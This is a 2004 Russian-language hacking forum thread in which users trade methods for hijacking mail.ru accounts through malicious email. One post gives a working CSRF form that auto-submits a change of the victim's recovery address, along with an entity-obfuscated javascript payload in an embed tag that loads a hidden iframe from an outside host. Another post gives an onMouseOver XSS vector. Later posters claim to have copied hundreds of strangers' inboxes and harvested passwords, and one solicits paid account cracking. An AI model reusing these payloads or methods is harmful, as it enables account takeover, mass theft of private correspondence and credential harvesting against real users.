Jazzzsummerman ты же мозг, помоги

Discussion in 'Песочница' started by skalpel, 31 Aug 2004.

1. skalpel

skalpel Banned

Reputations:
    0
    JazzzSummerMan конкретный вопрос тебе.

Посоветуй как вставить скрипт в письмо, который сработает если открыть письмо на майл.ру? Было бы чудесно если бы можно было вставить скрипт посылающий куку на ваш снифер - тогда можно было бы читать емайлы почти каждоко дурака. а в переписке частенько можно наткнуться на пасворды для чего нибудь другого которые одонаковые спасвордом на майл.ру.

вообщем JazzzSummerMan если ты сможешь вставить такой скрипт я тебе через день пришлю програмку которая будет копировать весь ящик жертв открывших письмо с твоим скриптом.

2. Че Гевара

Че Гевара Elder - Старейшина

Reputations:
    8
    На любой сайт заливаешь
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
    <input type="hidden" name="page" value="2">
    <input type="hidden" name="Email" value="hacker@antichat.ru">
    <input type="hidden" value="Сохранить" name="Save">
    </form>
    <script>
    document.anketa.submit();
    </script>
    [/QUOTE]<span id='postcolor'>
    Само письмо отправляешь в виде html с содержанием:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <embed src="&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58status=location;document.getElementById('xxx').innerHTML='<&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101 src=http://skalpel.ru/mailscript.html width=0 height=0></&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101>';this.wav" width=0 height=0> <p id='xxx'>
    [/QUOTE]<span id='postcolor'>
    Где http://skalpel.ru/mailscript.html - твой сйт с первым скриптом ...
    Отправляешь письмо ...

3. skalpel

skalpel Banned

Reputations:
    0
    Че Гевара, JazzzSummerMan или кто нибудь

уберите пожалуйста этот мой топик, он только занимает место и засоряет форум. И из другого форума про чаты тоже уберите мой свежий мусор.

4. Рогатый Трупоед

Рогатый Трупоед Elder - Старейшина

Reputations:
    0
    А что то случилось? &nbsp;[​IMG]

5. m0nzt3r

m0nzt3r моня

Reputations:
    591
    2skalpel

Зачем передумал? [​IMG]

6. skalpel

skalpel Banned

Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (m0nzt3r @ августа 31 2004,23:34)</td></tr><tr><td id="QUOTE">[/QUOTE]<span id='postcolor'>
    ЗАЯВЛЕНИЕ

Я кретин обещаю больше не забазаривться и глубоко раскаиваюсь в засорении этого форума своими бессмысленными сообщениями с безсвязанным содержаением. Я больше так не буду. Администраторы поменяйте пожалуйста мне мое поганяло на &quot;ПОРОЖНЯК&quot; и сотрите весь мой бред за который мне ужасно стыдно.

7. JazzzSummerMan

Reputations:
    14
    скальпель

скрипт из письма на мэйл.ру можно запустить самым простейшим способом:

&lt;a href=&quot;xxx&quot;onMouseOver=alert()&gt;xxxxx&lt;/a&gt;

обрати внимание, после кавычек не должно быть пробела.
    и отсылать надо в формате HTML/plaintext
    а то были экземпляры, которые скрипт в виде текста присылали

1 person likes this.
  8. skalpel

skalpel Banned

Reputations:
    0
    Спасибо друг

Ценю твою помощь.
    Но я уже раскаялся. Но не на долго. Вообще то я пошел альтернативным путем. Надеюсь через недельку как конкретно наржусь с извращенцев и загублю все извращенческие чаты я вам сообщю о своих скромных результатах.

9. JazzzSummerMan

Reputations:
    14
    было бы весьма интересно)

10. Guest

Guest Guest

Reputations:
    0
    так вот попробовал вчера я посмотреть о чем пишут посетители извращенческих чатов на майл.ру. скопировал ~70 inbox'ов этих уродов. вот некоторые статистические выводы: некоторые уроды (большинство) в чатах используют беспонтовые емайлы на которых ничего нет, только фотографии; некоторые уроды используют тот же пасворд для майл.ру и для разных других вебстраниц; удивительно но большинство педофилов - девушки &nbsp;и ящики у них просто забиты педофилятиной; многие уроды в реальной жизни прикидываються &nbsp;нормальными. &nbsp;
    к сожалению как то в извращенческих чатах не было создателей. но работа продолжается....

11. Guest

Guest Guest

Reputations:
    0
    Скальпель, ты можешь сломать ящик mail.ru?
    Если да, давай попробуем договориться о цене на взлом. Если согласишься, чиркни на sotsopros@front.ru

12. Guest

Guest Guest

Reputations:
    0
    могу помочь бескорыстно, но через 2 недели. сейчас я прикалываюсь в далеке от компьютеров. если хочешь можешь сам попробывать - мои програмки for free. но ты сможешь только посмотреть все письма и только иногда из них можно узнать пассворд.

13. Егорыч+++

Staff Member

Reputations:
    20
    Скальпель ты лучше статью напиши про свои изыскания и мы ее на АНТИЧАТ повесим...

14. Algol

Algol New Member

Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ сентября 03 2004,13:15)</td></tr><tr><td id="QUOTE">удивительно но большинство педофилов - девушки  и ящики у них просто забиты педофилятиной; многие уроды в реальной жизни прикидываються  нормальными.  
    к сожалению как то в извращенческих чатах не было создателей. но работа продолжается....[/QUOTE]<span id='postcolor'>
    Выкладывай ники и фотки в &quot;Юмор&quot;.
    Мы тоже посмеемся &nbsp;[​IMG]

15. Рогатый Трупоед

Рогатый Трупоед Elder - Старейшина

Reputations:
    0
    А извращенцев мне на мыло!!! Я тоже им применение найду [​IMG]

16. Guest

Guest Guest

Reputations:
    0
    Э Алгол, я же тебе писал возми на сайт мои програмки, с исходниками и если хлчешь результатами в виде 300 inbox-ов извращенцев. вот посмотришь и поприкалываешься. я уже писал, что можно так прочитать что станет не смешно. и я признаюсь сначала я сдал несколько извращенцев не ментам, но просто администраторам локальных сетей с которых они ведут переписку.
    я скажу честно что столько говна я сам не читал - я просто делал file search в скачаных письмах и для файла со словом пароль и так я набрал немного паролей.

кроме того тебе как действительно мозгу я скажу что мне до тебя далеко но у меня есть другие новые конкретные идеи про майл ру но я сообщу попоже

17. Guest

Guest Guest

Reputations:
    0
    скальпель
    И где-же глянуть твои програмки ?

18. Algol

Algol New Member

Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ сентября 17 2004,20:19)</td></tr><tr><td id="QUOTE">Э Алгол, я же тебе писал возми на сайт мои програмки, с исходниками[/QUOTE]<span id='postcolor'>
    Ну и что ты за это хочешь ?

19. Guest

Guest Guest

Reputations:
    0
    хочу просто бескорыстно помочь людям приколоться

Я в следующую среду вернусь к себе и пошлю тебе, только напиши свой емайл. все написано на вс++ 6.0, написано коряво, но все работает и есть только одна кнопка.

20. Егорыч+++

Staff Member

Reputations:
    20
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ сентября 22 2004,18:36)</td></tr><tr><td id="QUOTE">хочу просто бескорыстно помочь людям приколоться

Я в следующую среду вернусь к себе и пошлю тебе, только напиши свой емайл. все написано на вс++ 6.0, написано коряво, но все работает и есть только одна кнопка.[/QUOTE]<span id='postcolor'>
    Программа это конечно хорошо, но гораздо интересней статья на эту тему была бы... с описаловом.. что да как... исходники тоже неплохо.. А так если лень писать статью шли info@antichat.ru